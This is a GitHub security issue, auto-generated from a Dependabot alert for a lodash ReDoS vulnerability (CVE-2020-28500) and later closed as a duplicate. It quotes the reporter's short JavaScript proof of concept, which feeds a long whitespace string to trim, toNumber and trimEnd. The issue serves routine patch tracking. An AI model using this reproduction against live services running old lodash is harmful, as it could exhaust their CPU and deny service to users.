Recidiviz/supervision-success-component

Security Alert - Package: lodash; Severity: MEDIUM; Vuln ID: GHSA-29mw-wpgm-hmr9

Closed this issue · 1 comment


due: 2022-03-25

    A new vulnerability has been reported by Dependabot. The criticality of this vulnerability is MEDIUM.

    MEDIUM vulnerabilities have an SLA of 60 days according to our policy.

    Affected package: lodash
    Ecosystem: NPM
    Affected version range: < 4.17.21

    Summary: Regular Expression Denial of Service (ReDoS) in lodash
    Description: All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.
    Steps to reproduce (provided by reporter Liyuan Chen):

        var lo = require('lodash');

        // Build "1" + n spaces + "1". The long whitespace run that does not
        // reach the end of the string is what the trimming regexes in
        // lodash < 4.17.21 re-scan from every position, so the cost grows
        // quadratically with n.
        function build_blank (n) {
          var ret = "1";
          for (var i = 0; i < n; i++) {
            ret += " ";
          }
          return ret + "1";
        }

        var s = build_blank(50000);

        // Time each affected function on the same input (milliseconds).
        var time0 = Date.now();
        lo.trim(s);
        var time_cost0 = Date.now() - time0;
        console.log("time_cost0: " + time_cost0);

        var time1 = Date.now();
        lo.toNumber(s);
        var time_cost1 = Date.now() - time1;
        console.log("time_cost1: " + time_cost1);

        var time2 = Date.now();
        lo.trimEnd(s);
        var time_cost2 = Date.now() - time2;
        console.log("time_cost2: " + time_cost2);

    Identifiers: GHSA-29mw-wpgm-hmr9, CVE-2020-28500

    Fixed Version: 4.17.21
    Created Date: January 18, 2022

    ***Additional Context***
    https://github.com/Recidiviz/supervision-success-component/security/dependabot?q=is%3Aopen+sort%3Anewest

The Recidiviz security team has been exploring some automation in this ticket: https://github.com/Recidiviz/security-operations-automation/issues/5

The goal is to automatically generate GitHub issues when a Dependabot alert is made. On January 24, 2022, the script we are using was modified. This led to several dozen duplicate issues being created and reported as vulnerabilities. This issue is one of those duplicate issues.

Given that the issue is a duplicate, we have closed this issue out and removed the following labels:

Severity Label
Subject: Security
Subject: Vulnerability